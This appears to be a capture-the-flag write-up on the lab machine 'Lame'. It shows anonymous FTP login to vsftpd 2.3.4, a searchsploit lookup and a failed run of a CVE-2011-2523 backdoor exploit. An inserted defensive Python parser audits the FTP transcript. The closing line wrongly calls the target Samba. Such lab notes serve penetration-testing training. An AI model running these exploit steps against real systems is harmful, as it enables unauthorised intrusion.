FTP
Nmap discovered an FTP server on the target's port 21
The running service is vsftpd 2.3.4
While vsftpd 2.3.4 is known to have a backdoor vulnerability, I will take a look at the content hosted inside
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ ftp $IP
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23512|).
150 Here comes the directory listing.
226 Directory send OK.
While the target FTP server allows anonymous login, nothing seems to be inside
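A defender's view of the same session, as an added example that is not part of the original notes: a Python function that parses an ftp client transcript and reports the banner version, whether an anonymous login was accepted, and how many entries the listing returned. The function name, the FLAGGED set and the embedded sample transcript are assumptions constructed for this example.

```python
import re

# Constructed sample: the client transcript from the session above.
SAMPLE = """\
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||23512|).
150 Here comes the directory listing.
226 Directory send OK.
"""

ANON_NAMES = {"ftp", "anonymous"}
FLAGGED = {("vsftpd", "2.3.4")}  # release these notes tie to CVE-2011-2523

def audit_ftp_transcript(text):
    """Summarise an ftp(1) client transcript for an exposure review."""
    out = {"banner": None, "flagged_version": False,
           "anonymous_login": False, "epsv_port": None, "listing_entries": 0}
    user, in_listing = None, False
    for line in text.splitlines():
        name = re.match(r"Name \([^)]*\): (\S+)", line)
        reply = re.match(r"(\d{3})[ -](.*)", line)
        if name:
            user = name.group(1).lower()
        elif reply is None:
            # Non-reply lines between 150 and 226 are directory entries.
            if in_listing and line.strip():
                out["listing_entries"] += 1
        else:
            code, msg = reply.groups()
            if code == "220" and out["banner"] is None:
                out["banner"] = msg.strip()
                sw = re.search(r"([A-Za-z]+)\s+(\d+(?:\.\d+)+)", msg)
                out["flagged_version"] = bool(sw) and (sw.group(1).lower(), sw.group(2)) in FLAGGED
            elif code == "230" and user in ANON_NAMES:
                out["anonymous_login"] = True
            elif code == "229":
                port = re.search(r"\(\|\|\|(\d+)\|\)", msg)
                out["epsv_port"] = int(port.group(1)) if port else None
            elif code in ("150", "226"):
                in_listing = code == "150"
    return out
```

Calling audit_ftp_transcript(SAMPLE) reports the flagged banner, the accepted anonymous login and zero listing entries, matching what the session shows.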
Vulnerability
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ searchsploit vsftp 2.3.4
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
-------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No Results
I have the exploit available locally.
┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ python3 CVE-2011-2523.py $IP 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[!] failed to connect to backdoor on 10.10.10.3:6200
The target Samba instance is not vulnerable to CVE-2011-2523